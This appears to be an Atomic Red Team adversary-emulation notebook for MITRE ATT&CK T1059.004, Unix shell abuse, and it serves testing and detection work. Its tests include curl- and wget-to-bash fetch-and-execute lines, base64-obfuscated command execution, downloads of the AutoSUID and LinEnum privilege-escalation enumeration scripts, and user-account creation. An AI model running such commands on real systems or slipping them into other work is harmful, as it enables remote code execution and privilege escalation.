# T1059.004 - Unix Shell
Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.

Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.

## Atomic Tests

### Atomic Test #1 - Create and Execute Bash Shell ScriptCreates and executes a simple sh script.
**Supported Platforms:** linux, macos#### Attack Commands: Run with `sh`
```sh
sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh"
chmod +x /tmp/art.sh
sh /tmp/art.sh
```

In [ ]:
Invoke-AtomicTest T1059.004 -TestNumbers 1

#### Cleanup: 
```sh
rm /tmp/art.sh
```

In [ ]:
Invoke-AtomicTest T1059.004 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Command-Line InterfaceUsing Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.

Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
**Supported Platforms:** linux, macos#### Attack Commands: Run with `sh`
```sh
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
```

In [ ]:
Invoke-AtomicTest T1059.004 -TestNumbers 2

#### Cleanup: 
```sh
rm /tmp/art-fish.txt
```

In [ ]:
Invoke-AtomicTest T1059.004 -TestNumbers 2 -Cleanup

### Atomic Test #3 - Harvest SUID executable files
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges. 

**Supported Platforms:** linux
#### Dependencies:  Run with `bash`!
##### Description: AutoSUID must exist on disk at specified location (#{autosuid})

##### Check Prereq Commands:
```sh
if [ -f PathToAtomicsFolder/T1059.004/src/AutoSUID.sh ]; then exit 0; else exit 1; fi;

```
##### Get Prereq Commands:
```sh
curl --create-dirs https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh --output PathToAtomicsFolder/T1059.004/src/AutoSUID.sh

```

In [ ]:
Invoke-AtomicTest T1059.004 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
chmod +x PathToAtomicsFolder/T1059.004/src/AutoSUID.sh
bash PathToAtomicsFolder/T1059.004/src/AutoSUID.sh
```

In [ ]:
Invoke-AtomicTest T1059.004 -TestNumbers 3

#### Cleanup: 
```sh
rm -rf PathToAtomicsFolder/T1059.004/src/AutoSUID.sh
```

In [ ]:
Invoke-AtomicTest T1059.004 -TestNumbers 3 -Cleanup

### Atomic Test #4 - LinEnum tool execution
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.

**Supported Platforms:** linux
#### Dependencies:  Run with `bash`!
##### Description: LinnEnum must exist on disk at specified location (#{linenum})

##### Check Prereq Commands:
```sh
if [ -f PathToAtomicsFolder/T1059.004/src/LinEnum.sh ]; then exit 0; else exit 1; fi;

```
##### Get Prereq Commands:
```sh
curl --create-dirs https://raw.githubusercontent.com/rebootuser/LinEnum/c47f9b226d3ce2848629f25fe142c1b2986bc427/LinEnum.sh --output PathToAtomicsFolder/T1059.004/src/LinEnum.sh

```

In [ ]:
Invoke-AtomicTest T1059.004 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
chmod +x PathToAtomicsFolder/T1059.004/src/LinEnum.sh
bash PathToAtomicsFolder/T1059.004/src/LinEnum.sh
```

In [ ]:
Invoke-AtomicTest T1059.004 -TestNumbers 4

#### Cleanup: 
```sh
rm -rf PathToAtomicsFolder/T1059.004/src/LinEnum.sh
```

In [ ]:
Invoke-AtomicTest T1059.004 -TestNumbers 4 -Cleanup

### Atomic Test #5 - New script file in the tmp directoryAn attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which results in the id command being executed.
**Supported Platforms:** linux
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
```

In [ ]:
Invoke-AtomicTest T1059.004 -TestNumbers 5

#### Cleanup: 
```sh
rm $TMPFILE
unset TMPFILE
```

In [ ]:
Invoke-AtomicTest T1059.004 -TestNumbers 5 -Cleanup

### Atomic Test #6 - What shell is runningAn adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
**Supported Platforms:** linux
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
```

In [ ]:
Invoke-AtomicTest T1059.004 -TestNumbers 6

### Atomic Test #7 - What shells are availableAn adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
**Supported Platforms:** linux
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
cat /etc/shells 
```

In [ ]:
Invoke-AtomicTest T1059.004 -TestNumbers 7

### Atomic Test #8 - Command line scriptsAn adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
**Supported Platforms:** linux#### Attack Commands: Run with `sh`
```sh
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
```

In [ ]:
Invoke-AtomicTest T1059.004 -TestNumbers 8

### Atomic Test #9 - Obfuscated command line scriptsAn adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to bash, which results in the id command being executed.
**Supported Platforms:** linux
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
```

In [ ]:
Invoke-AtomicTest T1059.004 -TestNumbers 9

### Atomic Test #10 - Change login shell
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user. 

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `bash`!
##### Description: chsh - change login shell, must be installed

##### Check Prereq Commands:
```bash
if [ -f /usr/bin/chsh ]; then echo "exit 0"; else echo "exit 1"; exit 1; fi

```
##### Get Prereq Commands:
```bash
echo "Automated installer not implemented yet, please install chsh manually"

```

In [ ]:
Invoke-AtomicTest T1059.004 -TestNumbers 10 -GetPreReqs

#### Attack Commands: Run with `bash`
```bash
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
```

In [ ]:
Invoke-AtomicTest T1059.004 -TestNumbers 10

#### Cleanup: 
```bash
[ "$(uname)" = 'FreeBSD' ] && rmuser -y art || userdel art
```

In [ ]:
Invoke-AtomicTest T1059.004 -TestNumbers 10 -Cleanup

### Atomic Test #11 - Environment variable scriptsAn adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
**Supported Platforms:** linux
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
```

In [ ]:
Invoke-AtomicTest T1059.004 -TestNumbers 11

#### Cleanup: 
```sh
unset ART
```

In [ ]:
Invoke-AtomicTest T1059.004 -TestNumbers 11 -Cleanup

### Atomic Test #12 - Detecting pipe-to-shell
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command.

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `bash`!
##### Description: Check if curl is installed on the machine.

##### Check Prereq Commands:
```sh
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi

```
##### Get Prereq Commands:
```sh
which apt && apt update && apt install -y curl || which pkg && pkg update && pkg install -y curl

```

In [ ]:
Invoke-AtomicTest T1059.004 -TestNumbers 12 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
cd /tmp
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh |bash
ls -la /tmp/art.txt      
```

In [ ]:
Invoke-AtomicTest T1059.004 -TestNumbers 12

#### Cleanup: 
```sh
rm /tmp/art.txt
```

In [ ]:
Invoke-AtomicTest T1059.004 -TestNumbers 12 -Cleanup

### Atomic Test #13 - Current kernel information enumerationAn adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
**Supported Platforms:** linux
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
uname -srm
```

In [ ]:
Invoke-AtomicTest T1059.004 -TestNumbers 13

## Detection
Unix shell usage may be common on administrator, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information discovery, collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. 